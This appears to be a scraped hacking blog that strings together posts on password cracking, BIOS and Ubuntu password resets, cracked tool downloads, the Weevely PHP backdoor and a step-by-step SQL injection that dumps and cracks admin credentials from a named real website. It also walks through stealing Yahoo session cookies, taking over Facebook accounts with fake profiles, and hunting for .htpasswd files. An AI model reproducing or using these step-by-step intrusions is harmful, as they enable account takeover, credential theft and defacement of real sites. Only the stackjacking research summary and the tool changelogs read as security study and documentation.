How to crack or Reset BIOS Password? ~Cracking Tutorials

The BIOS software is built into the PC, and is the first code run by a PC when powered on ('boot firmware'). The primary function of the BIOS is to set up the hardware and load and start a boot loader. When the PC starts up, the first job for the BIOS is to initialize and identify system devices such as the video display card, keyboard and mouse, hard disk drive, optical disc drive and other hardware. The BIOS then locates software held on a peripheral device (designated as a 'boot device'), such as a hard disk or a CD/DVD, and loads and executes that software, giving it control of the PC. This process is known as booting, or booting up, which is short for bootstrapping.

Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways:

1. Clear CMOS
This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected.

Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is gone.

If the above looks complicated, is easy to clear cmos by unplugging the BIOS battery and then put it back. But with the consequences of removing the label is the warranty on the battery BIOS.

2. Through DOS

First out of the windows with me restart your computer, start the computer in MS-DOS mode, use the option "Command Prompt Only"

At c: prompt, type: DEBUG
press enter. You will see the sign (-) at the DEBUG prompt, then type:
o 70 2e
at the DEBUG prompt will be displayed as-o 70 2e.
press enter and type:
-O 71 ff
press enter, the last type:
Q
hit enter, then you will get out of the DEBUG prompt and return to the C:> prompt.
Now restart your COMPUTER, and see the results

Forgotten Ubuntu Password – Reset within minutes

Forgotten Ubuntu Password – Reset within minutes

If you’ve ever forgotten your password, you aren’t alone… it’s probably one of the most common tech support problems I’ve encountered over the years. Luckily if you are using Ubuntu they made it incredibly easy to reset your password.

All it takes is adjusting the boot parameters slightly and typing a command or two, but we’ll walk you through it.

Reset Your Ubuntu Password

Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu.

Root Shell – Easy Method

If you have the option, you can choose the “recovery mode” item on the menu, usually found right below your default kernel option.

Then choose “Drop to root shell prompt” from this menu.

This should give you a root shell prompt.

Alternate Root Shell Method

If you don’t have the recovery mode option, this is the alternate way to manually edit the grub options to allow for a root shell.

First you’ll want to make sure to choose the regular boot kernel that you use (typically just the default one), and then use the “e” key to choose to edit that boot option.

Now just hit the down arrow key over to the “kernel” option, and then use the “e” key to switch to edit mode for the kernel option.

You’ll first be presented with a screen where you can find this written “ro single”

You’ll want to remove the “ro single” part with the backspace key, and then add this onto the end:

rw init=/bin/bash

Once you hit enter after adjusting the kernel line, you’ll need to use the B key to choose to boot with that option.

At this point the system should boot up very quickly to a command prompt.

Changing the Actual Password

You can use the following command to reset your password:

passwd <username>

After changing your password, use the following commands to reboot your system. (The sync command makes sure to write out data to the disk before rebooting)

sync
reboot –f

I found that the –f parameter was necessary to get the reboot command to work for some reason. You could always hardware reset instead, but make sure to use the sync command first.
And now you should be able to login without any issues.

Best Password Hacking Breaking Tools 2011 Link Updated

Hello Friends , Today I am sharing with you my latest Collection of "Best Password Hacking Tools 2011". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will like this post.

This Password Hacking Kit Consists of following Password Hacking Breaking Tools:

1. PDF Password Remover

2. Windows XP Admin Password Remover

3. Zip File Password Cracker.

4. SQL Password Remover

5. Microsoft Office Password Remover.

6. Microsoft Windows Vista Password Remover.

7. Rar File Password Cracker

8. Windows Password Recovery Kit

9. Password Changer.

10. Distributed File Password Recovery..

and much more..

As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools ..

How to Use it??

1. Download the Password Hacking Kit From Below:

DOWNLOAD

2. Extract the file and Install it.

3. Then Register them and use it. ( all tools contains Full serial keys and patches)..

A Stealth Tiny PHP Backdoor! weevely

With Weevely you can create and manage PHP trojan designed to be hardly detectable. This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. Generate PHP code to trojanize a web server, and act like a telnet client to execute commands or inject addictional function on backdoored server. weevely is also included in blackbox linux.

Features of weevely:

• Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
• PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server.
• Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
• Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .

Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses.

Download Weevely v0.3 (weevely-0.3.tar.gz) here.

SQL Injection | Step by Step deface website

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



 


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from 
 information_schema.tables where table_schema=database()-- Click here
We got first table name on the screen.

To get all tables use group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()-- Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).

Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.



So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms. 

Kindly mention your queries in comments. The same thing we did can be done easily using automated tools.I will write that in next post. But avoid tools,if you really want to learn new.

Download BackTrack 5

How to download BackTrack 5

Download BackTrack 5 directly

Download BackTrack 5 from Mirror - Download BackTrack 5 Torrent

Name:     BT5-KDE-32.torrent
   
Size:           1840
   
Flavor:        KDE
   
Arch:          32 bit
   
Image:       ISO
   
Download BackTrack 5 KDE-32Bit  From Here  :     Torrent
   
MD5:     4150643026d292717f77ebb83948a034
     
=================

Name:     BT5-KDE-64.torrent
   
Size:            1800
   
Flavor:         KDE
   
Arch:           64 bit
   
Image:         ISO
   
Download BackTrack 5 KDE-64Bit From here :     Torrent
   
MD5:     80d65610de90ac7ede49b9f7935dfdd2
     
==================


Name:     BT5-GNOME-32.torrent
   
Size:                  1910
   
Flavor:              GNOME
   
Arch:                 32 bit
   
Image:               ISO
   
Download BackTrack 5 Gnome-32Bit From Here :       Torrent
   
MD5:                 b01a93a916fabb6d1640bd0054428e17

============================================

Name:              BT5-GNOME-64.torrent
   
Size:                1870
   
Flavor:            GNOME
   
Arch:               64 bit
   
Image:             ISO
   
Download BackTrack 5 Gnome-64Bit From Here:     Torrent
   
MD5:                75c4e7a969abc873d9e085656b156345

How to Hack Facebook Passwords by adding into friend list

How to Hack Facebook Password: Facebook Password Hacker

Hacking Facebook Passwords

How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.

Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.

You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the “Forgot your password?” link on the Facebook login page.

Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking the “No longer have access to these?” link. In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by typing wrong answers three times in a row. After that, Facebook provides a rather surprising way to get your account back – via the support of three friends.

1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.

2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.

3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.

4. To bypass problem mentioned in step 3 SOCIAL ENGINEERING. Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done.

NOTE: The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.

Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.

Bottom line is You don’t expose yourself to people you don’t know.

Hack email accounts or passwords using session cookies

Hi friends, welcome back today i will explain you how to hack email accounts and passwords of almost each and every website using session cookies. In my previous article i have explained you about session hijacking. Today i will show you the practical implementation of session hijacking that how can we take over others sessions and hack his email accounts and other website passwords. In this tutorial of hacking email accounts using session cookies, i will explain you with the help of yahoo account. I will tell you how to hack yahoo account using session cookies.

What are Session Cookies or Magic Cookie or Session ID?

Lets discuss this in very simple language, Whenever we login in our account, it generates a unique string that contains the path of automatic login for particular time then after that limited time it expires by itself.
Note its life is only up to when your web browser is open. If you close your web browser it will be get deleted(Its latest up gradation in cookie's field for providing more security).
Now this unique string or simply called Magic cookie is stored at two places first copy is stored on server(of which we cannot do anything) and second is stored in our web browser in form of cookie.
This cookie is destroyed by three ways first is when you close your web browser, second is when you sign out of your account and third is if you left your account open for more than 20 minutes idle.

How to access the cookies on local system?

As i am explaining this tutorial for hacking yahoo email account. So in your web browser just open yahoo.com and login into your account.
After that type the below code exactly and then press enter:

javascript:alert(document.cookie);

Now a popup box will appear showing the cookies something like this:

Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID's.


For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie.


After hacking the session cookies, we can use stolen session cookie to login into victim's account even without providing username and password as i already explained that session hacking removes the authentication on the server as we have the AUTO LOGIN cookie. In this type of attack when victim sign out , then hacker will also sign out. But in case of YAHOO its little bit different, when victim signout but attacker still have the access to his account. Yahoo maintains the session for 24 hours and then destroy the session ID's from its server.

How to Steal the Session Cookies?

1. Go to the Website and register there:

http://www.my3gb.com/register.jsp

2. Download the Cookie stealer files:

http://www.megaupload.com/?d=R1802HIE

3. Now upload the four files on the website and create one empty directory naming Cookies as shown below:

4. Now Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.

5. Now open the link Hacked.PHP to access the cookies. In my files the password is "explore". You need to put that to access the files.

6. You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

In my next article, I will explain you how to decode the cookies. In this tutorial you will get the cookies only which are in encypted form. You will be able to login but you will not know what information it contains

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today's tutorial we will discuss How to hack the online sessions using Session Hijacking. In today's Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on...

How Session Hijacking works

What is Session Hijacking?

Let's discuss them in common term's, Session Hijacking by the name only it suggests that we are hacking someone's active session and trying to exploit it by taking the unauthorized access over their computer system or Network. So Session Hijacking is the exploitation of valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or more correctly Magic Cookie Hack. Now you guys surely be thinking what is Magic Cookie.
Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website. So in Session Hijacking what Hacker does is that he tries to steal the Magic cookies of the active session that's why its called HTTP cookie Theft. Nowadays several websites has started using HTTPS cookies simply called encrypted cookies. But we all know If encrypter exits so its decrypter also :P..


Session Hijacking is the process of taking over a existing active session. One of the main reason for Hijacking the session is to bypass the authentication process and gain the access to the machine. Since the session is already active so there is no need of re-authenticating and the hacker can easily access the resources and sensitive information like passwords, bank details and much more. 

Different Types of Session Hijacking

Session Hijacking involves two types of attacks :
1. Active attack
2. Passive attack


In Passive attack, the hacker Hijacks a session, but just sits back and watches and records all the traffic that is being sent from the computer or received by the computer. This is useful for finding the sensitive information like username passwords of websites, windows and much more...


In Active attack, hacker finds the active session and takes over it. This is done by forcing one of the parties offline which is usually achieved by DDOS attack (Distributed Denial of service attack) . Now the hacker takes control over the active session and executes the commands on the system that either give him the sensitive information such as passwords or allow him to login at later time.
 There are also some hybrid attacks, where the attacker watches a session for while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.

Methods to Hijack Sessions

 There are four main methods used to perpetrate a session hijack. These are:

• Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
• Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
• Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
• Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

That's all for today later we will discuss in detail How to do the Session Hijacking practically. 
I hope you all like this...
If you have any queries ask me in form of comments...

Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels.  Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:

• an arbitrary kernel write; and
• a kernel stack memory disclosure

To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:

• Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
• Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
• Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.

For the full details, please see the presentation materials and PoC code:

• Infiltrate 2011 [PDF]
• Hackito Ergo Sum 2011 [PDF]
• PoC Code [GITHUB]

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:

• The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
• The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.

Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

sqlmap 0.9

sqlmap version 0.9.

“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.“

• Rewritten SQL injection detection engine (Bernardo and Miroslav).
• Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
• Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
• Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
• Implemented support for Firebird (Bernardo and Miroslav).
• Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
• Extended old ‘–dump -C‘ functionality to be able to search for specific database(s), table(s) and column(s), –search switch (Bernardo).
• Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
• Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
• Added support to enumerate roles on Oracle, –roles switch (Bernardo).
• Added support for SOAP based web services requests (Bernardo).
• Added support to fetch unicode data (Bernardo and Miroslav).
• Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
• Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
• Support to test and inject against HTTP Referer header (Miroslav).
• Implemented HTTP(s) proxy authentication support, –proxy-cred switch (Miroslav).
• Implemented feature to speedup the enumeration of table names (Miroslav).
• Support for customizable HTTP(s) redirections (Bernardo).
• Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, –replicate switch (Miroslav).
• Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
• Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns. Useful for instance when system table ‘information_schema‘ is not available on MySQL (Miroslav).
• Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav).
• Added safe URL feature, –safe-url and –safe-freq (Miroslav).
• Added –text-only switch to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content (Miroslav).
• Implemented few other features and switches (Bernardo and Miroslav).
• Over 100 bugs fixed (Bernardo and Miroslav).
• Major code refactoring (Bernardo and Miroslav).
• User’s manual updated (Bernardo).

Download sqlmap 0.9 (sqlmap-0.9.tar.gz/sqlmap-0.9.zip) here.

Hacking Tool: John the Ripper: Crack Password

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free
• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

Learn How to EXPLOIT : The Basics of EXPLOITING

NOTE: Some statements in here apply to beginners. If you read this and are an advanced user, you might say: "That is not true, I know a way....". Correct. But it is impossible to include every exception and technique without creating confusion. Read this essay as if you are a beginner....

NOTE 2: Some basic rules all good crackers and exploiters adhere to: Do not change, alter, or delete any info you may find on a site. This is just not done, and can actually
result in prosecution if you get caught.

On your exploiting journey, you may also come across confidential information from members, such as home addresses, credit card info etc. I know I have, many times over. I even found a hole where I could have the checks of site referrals sent to my account! Never use this information to your personal gain! This will be considered theft and misuse of personal information, and can get you into serious trouble...

OK, now with that out of the way, let's start the series on Exploiting...!

EXPLOITING - THE BASICS

OK, so you are tired of bruteforcing, have spoofed a couple of sites, and have seen posts with custom passes or complete member lists...and you wanna know how... If so, this essay is for you.

This basic exploiting essay assumes you understand or master the following techniques and skills with respect to website security:

• - Basic HTML
• - Brute forcing
• - Proxy use
• - Basic URL handling
• - Basic website structures
• - Basic Spoofing
• - Good AD skills or similar

But most importantly, you need a good brain and have a sincere interest in website security. Exploiting takes a lot of time and requires research on a regular basis. On the other hand, the rewards are well worth the effort in my opinion!

When trying to test the security of websites, you can gain access in the following manners, listed in order of technical difficulty:

1. 1. Guess passwords
2. 2. Brute force attacks
3. 3. Spoof the site
4. 4. Get and decrypt passfiles or logs
5. 5. Using scripts to add passes
6. 6. Get admin access (via telnet or browser)
7. 7. Hack the server via telnet

As you can see in the list above, exploiting is really nothing more than increasing your chances of getting access. Guessing passwords...to bruteforcing...to decrypting passfiles or logs...you increase your chances of getting a working pass with less effort!

HTACCESS and HTPASSWD

Since there are excellent tuts on this already, I am not going to spend a lot of time on this. One question I see a lot from newbies is that they "can not locate the htpasswd"....

A few notes on htaccess and htpasswd:

• - htaccess only sometimes shows the dir to the htpasswd (or passwd or different name)
• - the chances of getting this file are slim, as this vulnerability is well-known out there and most webmasters have denied you access, hidden the file, or placed the file on their home dir.

For the fans, here is some more detailed info on the subject I found:
In order to find the .htpasswd (or interpret the .htaccess) you need to understand the difference between the web root and the system root.

The AuthUserFile is specified in terms of the system root. That is, the directory structure you would see if you were actually logged into the computer through a terminal.

When a web browser accesses a machine, it is through a web server. The web server is configured so that the browser will start at some specific directory in the machine. I refer to that as the web root. It is specified in the web server configuration file, off in some directory you can't browse to.

So, lets say that the web root is set to /home/users/www.site.com/www. When you surf to http:/www.site.com/ you find yourself in the machine directory /home/users/www.site.com/www (but nothing really tells you that), and if there is an index.html there, you will display it.

So lets say that the web root is set as above, and that the .htaccess contains the line:

code:
--------------------------------------------------------------

AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd

--------------------------------------------------------------
(or something similar)

Applying what I said above, you would find the .htpasswd at:

code:
--------------------------------------------------------

http://www.site.com/hidden/.htpasswd

--------------------------------------------------------

Since the web root is /home/users/www.site.com/www. You still may not be able to read it because it might be forbidden through some other method, say only accessible from certain IP addresses, or . files are not accessible through their web server.

Now, lets say the .htaccess said:


code:
--------------------------------------------------------------

AuthUserFile /home/users/abc.com/hidden/.htpasswd

--------------------------------------------------------------

Now, there is no way we can get to it since the web root puts us in home/users/www.site.com/hidden/www and we are well past the days when you could back up above a web root in an Apache web server.

If ../ worked, we would be in luck, since we could specify http://www.site.com/../hidden/.htpasswd. This used to work, or the unicoded version worked, or the double unicoded version worked, or quotes worked, or unicoded quotes, etc., etc. Not so anymore....

Our only hope, when the .htpasswd is not on the web root, is to find another exploit that will allow us to access files. Such things exist but are hard to find, so read on....

SO NOW WHAT?
Well, as you tried to get the passfile looking for it in the obvious locations, and failed...maybe there are other ways of obtaining it....

Using AD or another security scanner, you can start looking for so-called vulnerabilities. This means testing the website for security, and trying to find ways into the site. How does this work, you ask? We need a tool to test the security...

For these essays, I will be talking about a tool called WebSiteFinder, or WSF in short. Written by Wolfman, this is a great tool, in my opinion. AD or Passcraft can do the same, so use whatever you feel comfortable with. If you start out, use AD.

To make these tools really effective, you need an exploit list. This is a list of basic paths that will be tested for possible vulnerabilities or access against the website. AD offers a basic exploit list, at least the older versions did. Exploit lists can be found all over the web, but please realise these are very basic, and some of the holes (=vulnerabilities) they have in it, are old and will not work anymore on most sites.

HOW TO MAKE YOUR OWN EXPLOIT LIST
Really good exploiters or crackers will not share their lists with you. The reason: Once some exploits are made public, chances are the holes will be discovered quickly and thus closed! And that is a bummer.

So you have to build your own list. How, you ask? Here are a few tips.

1. ANALYZE, THINK, STUDY, BE CREATIVE
First place to start, is to analyze your current exploit list. What makes sense, and what does not. What paths do you understand? Why do you think that particular path is a vulnerability, and if you came accross it, how would you use it? If you don't know, ask on a forum via PM, there are many people around that can and will help you. Moreover, read up on security sites (better get used to it), such as packetstorm, securiteam, etc.

NOTE: It is no use to just try exploits on sites if you don't understand what you are doing. The results can be very bad. You could, unwillingly, do damage to the site!

2. KEEP YOUR EYES ON THE SCREEN
Look at directory trees of sites you visit. Try to go up and down in levels in the dir to possibly find more holes...copy these to your exploit list.

3. STATS and LOGS
These are KING in my book. Why? Stats show the requests made to a website, and some stats list all the requests....including those of someone trying to exploit the site. The paths that this person tried may not have worked on the site, but heh, copy them to your exploit list, they may come in handy for other sites! Access logs show the same thing...moreover, they might tell you alot about the server, home server (FTP logs), usernames, and the basic website structure.

